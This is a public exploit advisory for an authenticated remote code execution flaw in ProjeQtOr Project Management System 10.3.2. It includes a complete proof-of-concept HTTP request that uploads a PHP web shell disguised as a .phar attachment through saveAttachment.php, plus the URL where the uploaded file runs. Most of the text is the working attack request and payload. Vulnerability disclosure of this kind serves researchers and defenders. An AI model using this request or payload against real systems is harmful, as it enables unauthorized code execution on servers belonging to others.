ProjeQtOr Project Management System 10.3.2 Shell Upload

2023.04.23
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE) Application: ProjeQtOr Project Management System Version: 10.3.2 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://www.projeqtor.org Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download Date of found: 19.04.2023 Author: Mirabbas A─čalarov Tested on: Linux 2. Technical Details & POC ======================================== Possible including php file with phar extension while uploading image. Rce is triggered when we visit again Payload:<?php echo system("id"); ?> poc request: POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1 Host: localhost Content-Length: 1177 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" Accept: application/json Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 sec-ch-ua-platform: "Linux" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/projeqtor/view/main.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic Connection: close ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar" Content-Type: application/octet-stream <?php echo system("id"); ?> ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentId" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefType" User ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentRefId" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentType" file ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentLink" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentDescription" ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="attachmentPrivacy" 1 ------WebKitFormBoundaryY0bpJaQzcvQberWR Content-Disposition: form-data; name="uploadType" html5 ------WebKitFormBoundaryY0bpJaQzcvQberWR-- visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top